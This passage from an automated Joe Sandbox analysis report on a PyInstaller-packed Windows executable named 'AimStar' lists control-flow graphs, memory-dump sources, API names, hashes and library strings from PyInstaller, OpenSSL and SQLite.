7ff710f471a0 228->231 233 7ff710f43edb-7ff710f43ef0 call 7ff710f42a50 call 7ff710f46fb0 call 7ff710f46d60 229->233 230->231 242 7ff710f43ea6-7ff710f43ead 230->242 243 7ff710f43ebb-7ff710f43ec2 231->243 244 7ff710f43ec4-7ff710f43ed2 call 7ff710f474e0 231->244 233->177 242->233 243->233 244->177 257 7ff710f43ed4 244->257 249->165 250->249 259 7ff710f43fb5-7ff710f43fca 250->259 257->233 260 7ff710f43fcc-7ff710f43fdf call 7ff710f42710 call 7ff710f41900 259->260 261 7ff710f43fe4 call 7ff710f42a50 259->261 260->165 261->249
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                          • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                          • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                          • Opcode ID: d0508df3f57ee1b007a386c5103efc2761290cd4262653a9171a3b2890b356a0
                                                                                                                                                                                                                                          • Instruction ID: 1e33ddf3d0fd1846122f8d9e62ab027726d783c4b9834e4b14cc62656726858f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0508df3f57ee1b007a386c5103efc2761290cd4262653a9171a3b2890b356a0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C327C31E0CE8691EA15BB2194567B9A6A9EF44760FC48032DE5D833D6EF2CF55DC320
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2421082833.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421034768.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421426994.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421477177.00007FF8A9399000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a92d0000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $..\s\ssl\record\ssl3_record.c$CONNE$GET $HEAD $POST $PUT $ssl3_get_record
                                                                                                                                                                                                                                          • API String ID: 0-2781224710
                                                                                                                                                                                                                                          • Opcode ID: b400293baa34000780f5a339118ca863fb8810f07702305baec27cbd6e082666
                                                                                                                                                                                                                                          • Instruction ID: 2eb24045a7d9ce66cc1eef5ace54aa878e430422fd0dfe1a543049dd788ccc79
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b400293baa34000780f5a339118ca863fb8810f07702305baec27cbd6e082666
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31828E31A0EEC2A1FB649F21D8403BA62B1EF857C4F646036DA4DC76A9EF3CE5458711
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: always$aolf$bolb$bolc$buod$duplicate column name: %s$generated$laer$rahc$too many columns on %s$txet
                                                                                                                                                                                                                                          • API String ID: 0-2711416707
                                                                                                                                                                                                                                          • Opcode ID: 05ced19ffbda2af8d84160c6d126e85ab313c37855989897a54843a788ef34fb
                                                                                                                                                                                                                                          • Instruction ID: 1de4808d439d3b22269ef6788b659f7c551f300226ae59c58a5ddb2642f3b133
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05ced19ffbda2af8d84160c6d126e85ab313c37855989897a54843a788ef34fb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9228722A4F5D269EB298B2590582B97BD3EB41BC4F448136DAAF473D1DF3CD9418328

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 861 7ff8a87692c0-7ff8a876933f 862 7ff8a876949d-7ff8a87694b3 861->862 863 7ff8a8769345-7ff8a876934f 861->863 864 7ff8a87693af-7ff8a87693f5 call 7ff8a8756180 862->864 865 7ff8a87694b9-7ff8a87694bf 862->865 863->862 866 7ff8a8769355-7ff8a8769358 863->866 875 7ff8a8769a8e-7ff8a8769a91 864->875 876 7ff8a87693fb-7ff8a876945f call 7ff8a888382c 864->876 865->864 867 7ff8a87694c5-7ff8a87694db call 7ff8a8756180 865->867 866->865 869 7ff8a876935e 866->869 878 7ff8a8769aee 867->878 879 7ff8a87694e1-7ff8a87694fc 867->879 870 7ff8a8769365-7ff8a876936e 869->870 870->870 873 7ff8a8769370-7ff8a876937f call 7ff8a8756180 870->873 873->878 887 7ff8a8769385-7ff8a876939b 00007FF8BFAC3010 873->887 875->878 880 7ff8a8769a93-7ff8a8769a9a 875->880 891 7ff8a8769788-7ff8a8769798 876->891 892 7ff8a8769465-7ff8a8769481 00007FF8BFAC3010 876->892 883 7ff8a8769af3-7ff8a8769b0a 878->883 895 7ff8a87694fe-7ff8a876950f 879->895 896 7ff8a8769516-7ff8a876951d 879->896 884 7ff8a8769a9c-7ff8a8769aa6 880->884 885 7ff8a8769ae5 880->885 889 7ff8a8769aae-7ff8a8769adb 884->889 890 7ff8a8769aa8 884->890 885->878 894 7ff8a87693a0-7ff8a87693a7 887->894 889->878 915 7ff8a8769add-7ff8a8769ae3 889->915 890->889 893 7ff8a87696df-7ff8a8769704 891->893 897 7ff8a876963b 892->897 898 7ff8a8769487-7ff8a8769498 00007FF8BFAC3010 892->898 899 7ff8a876983f 893->899 900 7ff8a876970a-7ff8a876970f 893->900 894->894 901 7ff8a87693a9 894->901 895->896 903 7ff8a8769520-7ff8a8769527 896->903 902 7ff8a876963e-7ff8a8769687 00007FF8BFAC3010 * 2 897->902 898->902 906 7ff8a8769844-7ff8a8769852 899->906 900->899 905 7ff8a8769715-7ff8a8769741 call 7ff8a875ffe0 900->905 901->864 907 7ff8a87696dd 902->907 908 7ff8a8769689-7ff8a8769690 902->908 903->903 909 7ff8a8769529-7ff8a8769530 903->909 916 7ff8a8769744-7ff8a8769764 905->916 911 7ff8a8769855-7ff8a8769858 906->911 907->893 912 7ff8a876977a-7ff8a8769783 908->912 913 7ff8a8769696-7ff8a87696a0 908->913 914 7ff8a8769537-7ff8a876953e 909->914 917 7ff8a876985e-7ff8a8769879 call 7ff8a8768840 911->917 918 7ff8a876990b-7ff8a8769915 911->918 912->907 919 7ff8a87696a8-7ff8a87696d5 913->919 920 7ff8a87696a2 913->920 914->914 921 7ff8a8769540-7ff8a8769557 914->921 915->878 924 7ff8a876983a-7ff8a876983d 916->924 925 7ff8a876976a-7ff8a8769774 916->925 917->918 945 7ff8a876987f-7ff8a8769903 917->945 922 7ff8a8769917-7ff8a8769920 918->922 923 7ff8a8769923-7ff8a8769936 call 7ff8a8764700 918->923 919->907 959 7ff8a87696d7 919->959 920->919 927 7ff8a8769559 921->927 928 7ff8a87695a7-7ff8a87695ae 921->928 922->923 953 7ff8a876993c-7ff8a8769946 923->953 954 7ff8a8769a80-7ff8a8769a8c 923->954 924->911 934 7ff8a876979d-7ff8a87697a0 925->934 935 7ff8a8769776-7ff8a8769778 925->935 937 7ff8a8769560-7ff8a8769567 927->937 931 7ff8a87695d2-7ff8a87695d9 928->931 932 7ff8a87695b0-7ff8a87695b7 928->932 942 7ff8a876962a 931->942 943 7ff8a87695db-7ff8a87695e5 931->943 932->864 940 7ff8a87695bd-7ff8a87695cc call 7ff8a8815b50 932->940 944 7ff8a87697a2-7ff8a87697aa 934->944 935->944 946 7ff8a8769570-7ff8a8769579 937->946 940->864 940->931 961 7ff8a8769633-7ff8a8769636 942->961 955 7ff8a87695ed-7ff8a876961a 943->955 956 7ff8a87695e7 943->956 950 7ff8a87697ce-7ff8a87697e4 call 7ff8a8816b40 944->950 951 7ff8a87697ac-7ff8a87697c0 call 7ff8a8767c10 944->951 966 7ff8a8769969-7ff8a876996f 945->966 967 7ff8a8769905 945->967 946->946 947 7ff8a876957b-7ff8a8769589 946->947 958 7ff8a8769590-7ff8a8769599 947->958 976 7ff8a87697fd 950->976 977 7ff8a87697e6-7ff8a87697fb call 7ff8a87ce010 950->977 951->950 975 7ff8a87697c2-7ff8a87697c7 951->975 964 7ff8a876994e-7ff8a8769961 953->964 965 7ff8a8769948 953->965 954->883 955->961 984 7ff8a876961c-7ff8a8769625 955->984 956->955 958->958 968 7ff8a876959b-7ff8a87695a5 958->968 959->907 961->883 964->966 965->964 973 7ff8a8769998-7ff8a87699a8 966->973 974 7ff8a8769971-7ff8a8769994 966->974 967->918 968->928 968->937 988 7ff8a87699aa 973->988 989 7ff8a87699b0-7ff8a87699e1 973->989 974->973 975->950 981 7ff8a87697ff-7ff8a8769804 976->981 977->981 982 7ff8a8769806-7ff8a876981c call 7ff8a8816b40 981->982 983 7ff8a8769832-7ff8a8769838 981->983 982->924 994 7ff8a876981e-7ff8a8769830 call 7ff8a87ce010 982->994 983->906 984->883 988->989 992 7ff8a87699f4-7ff8a87699fb 989->992 993 7ff8a87699e3-7ff8a87699f2 989->993 995 7ff8a87699ff-7ff8a8769a21 call 7ff8a8767c10 992->995 993->995 994->924 994->983 1000 7ff8a8769a29-7ff8a8769a2c 995->1000 1001 7ff8a8769a23-7ff8a8769a27 995->1001 1003 7ff8a8769a2e-7ff8a8769a31 1000->1003 1004 7ff8a8769a33 1000->1004 1002 7ff8a8769a37-7ff8a8769a49 1001->1002 1005 7ff8a8769a4b-7ff8a8769a52 1002->1005 1006 7ff8a8769a54-7ff8a8769a66 1002->1006 1003->1002 1003->1004 1004->1002 1007 7ff8a8769a6a-7ff8a8769a7e 1005->1007 1006->1007 1007->883
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: -journal$immutable$nolock
                                                                                                                                                                                                                                          • API String ID: 2830847230-4201244970
                                                                                                                                                                                                                                          • Opcode ID: fc4aa575c3cfefd8825882f0133770488bd7e5ee514113ffe19fff9c73ff247a
                                                                                                                                                                                                                                          • Instruction ID: 029885a269e5684255da6d6b15cc2bfe56456d99943f04e220bd5be9acbe34f3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc4aa575c3cfefd8825882f0133770488bd7e5ee514113ffe19fff9c73ff247a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2732CC32A0A786AAEB658F25944437937A1FF45BE4F084234CA6E07BD5DF3CE451C328
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API call with %s database connection pointer$NULL$invalid$misuse$unopened
                                                                                                                                                                                                                                          • API String ID: 2830847230-509082904
                                                                                                                                                                                                                                          • Opcode ID: bb2508857dcb7d8c4db46005c6d5cba0b088fe6dfdcbe4bc87886fb66250b61f
                                                                                                                                                                                                                                          • Instruction ID: c182001d29bc690e7ff90d623c0ef6e1bcfdc0cbe1c0e67e0c8a43e2c3765add
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb2508857dcb7d8c4db46005c6d5cba0b088fe6dfdcbe4bc87886fb66250b61f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8312ACA2A4BA46A5EB54DF25A4503BA6FA1FF84BC4F144031DF4E07794DF3CE4A18328

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1306 7ff710f669d4-7ff710f66a47 call 7ff710f66708 1309 7ff710f66a49-7ff710f66a52 call 7ff710f54f58 1306->1309 1310 7ff710f66a61-7ff710f66a6b call 7ff710f58590 1306->1310 1315 7ff710f66a55-7ff710f66a5c call 7ff710f54f78 1309->1315 1316 7ff710f66a6d-7ff710f66a84 call 7ff710f54f58 call 7ff710f54f78 1310->1316 1317 7ff710f66a86-7ff710f66aef CreateFileW 1310->1317 1330 7ff710f66da2-7ff710f66dc2 1315->1330 1316->1315 1318 7ff710f66b6c-7ff710f66b77 GetFileType 1317->1318 1319 7ff710f66af1-7ff710f66af7 1317->1319 1325 7ff710f66bca-7ff710f66bd1 1318->1325 1326 7ff710f66b79-7ff710f66bb4 GetLastError call 7ff710f54eec CloseHandle 1318->1326 1322 7ff710f66b39-7ff710f66b67 GetLastError call 7ff710f54eec 1319->1322 1323 7ff710f66af9-7ff710f66afd 1319->1323 1322->1315 1323->1322 1328 7ff710f66aff-7ff710f66b37 CreateFileW 1323->1328 1333 7ff710f66bd9-7ff710f66bdc 1325->1333 1334 7ff710f66bd3-7ff710f66bd7 1325->1334 1326->1315 1341 7ff710f66bba-7ff710f66bc5 call 7ff710f54f78 1326->1341 1328->1318 1328->1322 1335 7ff710f66be2-7ff710f66c37 call 7ff710f584a8 1333->1335 1336 7ff710f66bde 1333->1336 1334->1335 1344 7ff710f66c39-7ff710f66c45 call 7ff710f66910 1335->1344 1345 7ff710f66c56-7ff710f66c87 call 7ff710f66488 1335->1345 1336->1335 1341->1315 1344->1345 1351 7ff710f66c47 1344->1351 1352 7ff710f66c8d-7ff710f66ccf 1345->1352 1353 7ff710f66c89-7ff710f66c8b 1345->1353 1354 7ff710f66c49-7ff710f66c51 call 7ff710f5ab30 1351->1354 1355 7ff710f66cf1-7ff710f66cfc 1352->1355 1356 7ff710f66cd1-7ff710f66cd5 1352->1356 1353->1354 1354->1330 1358 7ff710f66da0 1355->1358 1359 7ff710f66d02-7ff710f66d06 1355->1359 1356->1355 1357 7ff710f66cd7-7ff710f66cec 1356->1357 1357->1355 1358->1330 1359->1358 1361 7ff710f66d0c-7ff710f66d51 CloseHandle CreateFileW 1359->1361 1363 7ff710f66d53-7ff710f66d81 GetLastError call 7ff710f54eec call 7ff710f586d0 1361->1363 1364 7ff710f66d86-7ff710f66d9b 1361->1364 1363->1364 1364->1358
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1617910340-0
                                                                                                                                                                                                                                          • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                          • Instruction ID: 3d6b423a49bdf77829fa1d38af55f55ce240d54d2c4597cbe03b68c8a6d3d3b4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37C1E336B28E4185EB10DFA5C4922AC7779F749BA8F414225DE2E973D4CF38E059C310
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418799729.00007FF8A8719000.00000080.00000001.01000000.0000000F.sdmp, Offset: 00007FF8A8210000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417366174.00007FF8A8210000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417417497.00007FF8A8211000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417417497.00007FF8A8222000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417417497.00007FF8A8232000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417417497.00007FF8A8238000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417417497.00007FF8A8282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417417497.00007FF8A8297000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417417497.00007FF8A82A7000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417417497.00007FF8A82AE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417417497.00007FF8A82BC000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417417497.00007FF8A849E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417417497.00007FF8A8589000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417417497.00007FF8A858B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417417497.00007FF8A85C2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417417497.00007FF8A85FF000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417417497.00007FF8A865A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417417497.00007FF8A86CB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417417497.00007FF8A8700000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417417497.00007FF8A8713000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418850491.00007FF8A871A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8210000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                          • String ID: )tP
                                                                                                                                                                                                                                          • API String ID: 3300690313-3907340667
                                                                                                                                                                                                                                          • Opcode ID: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
                                                                                                                                                                                                                                          • Instruction ID: 160d00a12d4f81ca8824a5a2dc4f9fe9ace5ede0258cbdef67a068793e36efb1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE62232262919296E719CF38D4003BD76A0F7587C5F485532EA9EC3BD4EB3CEA46CB14

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 2220 7ff8a87d4cf0-7ff8a87d4dc1 call 7ff8a888382c 2223 7ff8a87d4dc3-7ff8a87d4dd6 2220->2223 2224 7ff8a87d4dd9-7ff8a87d4ddd 2220->2224 2223->2224 2225 7ff8a87d4dfd-7ff8a87d4e03 2224->2225 2226 7ff8a87d4ddf-7ff8a87d4df8 call 7ff8a875a510 2224->2226 2228 7ff8a87d4e05-7ff8a87d4e0f 2225->2228 2229 7ff8a87d4e16-7ff8a87d4e1e 2225->2229 2233 7ff8a87d526c-7ff8a87d529a call 7ff8a87d4a40 call 7ff8a8882920 2226->2233 2228->2229 2231 7ff8a87d4e24-7ff8a87d4e2a 2229->2231 2232 7ff8a87d4f01-7ff8a87d4f09 2229->2232 2236 7ff8a87d4e30-7ff8a87d4e37 2231->2236 2237 7ff8a87d4efc 2231->2237 2234 7ff8a87d4f13-7ff8a87d4f16 2232->2234 2235 7ff8a87d4f0b-7ff8a87d4f0e call 7ff8a87ee6e0 2232->2235 2240 7ff8a87d4f1c 2234->2240 2241 7ff8a87d4fbb-7ff8a87d4fc3 call 7ff8a880fcf0 2234->2241 2235->2234 2242 7ff8a87d4e40-7ff8a87d4e4c 2236->2242 2237->2232 2244 7ff8a87d4f1e-7ff8a87d4f24 2240->2244 2245 7ff8a87d4f2a-7ff8a87d4f31 2240->2245 2254 7ff8a87d4fc8-7ff8a87d4fcb 2241->2254 2246 7ff8a87d4ebe-7ff8a87d4ec9 2242->2246 2247 7ff8a87d4e4e-7ff8a87d4e52 2242->2247 2244->2241 2244->2245 2250 7ff8a87d4f33-7ff8a87d4f56 call 7ff8a875a380 call 7ff8a8756d20 2245->2250 2251 7ff8a87d4f5b-7ff8a87d4f5e 2245->2251 2255 7ff8a87d4ef7 2246->2255 2256 7ff8a87d4ecb-7ff8a87d4ecd 2246->2256 2252 7ff8a87d4e54-7ff8a87d4e5b 2247->2252 2253 7ff8a87d4e67-7ff8a87d4e6f 2247->2253 2250->2233 2257 7ff8a87d4f60-7ff8a87d4f72 call 7ff8a8756880 2251->2257 2258 7ff8a87d4fae-7ff8a87d4fb9 2251->2258 2252->2253 2261 7ff8a87d4e5d-7ff8a87d4e65 call 7ff8a876ff80 2252->2261 2253->2246 2264 7ff8a87d4e71-7ff8a87d4e78 2253->2264 2262 7ff8a87d4fd7-7ff8a87d4fe3 2254->2262 2263 7ff8a87d4fcd-7ff8a87d4fd4 2254->2263 2255->2237 2256->2242 2257->2258 2284 7ff8a87d4f74-7ff8a87d4fac 00007FF8BFAC3010 call 7ff8a880fcf0 call 7ff8a8756400 2257->2284 2258->2254 2261->2253 2270 7ff8a87d4fe5-7ff8a87d4ff1 2262->2270 2271 7ff8a87d5048-7ff8a87d504c 2262->2271 2263->2262 2265 7ff8a87d4e87-7ff8a87d4e8e 2264->2265 2266 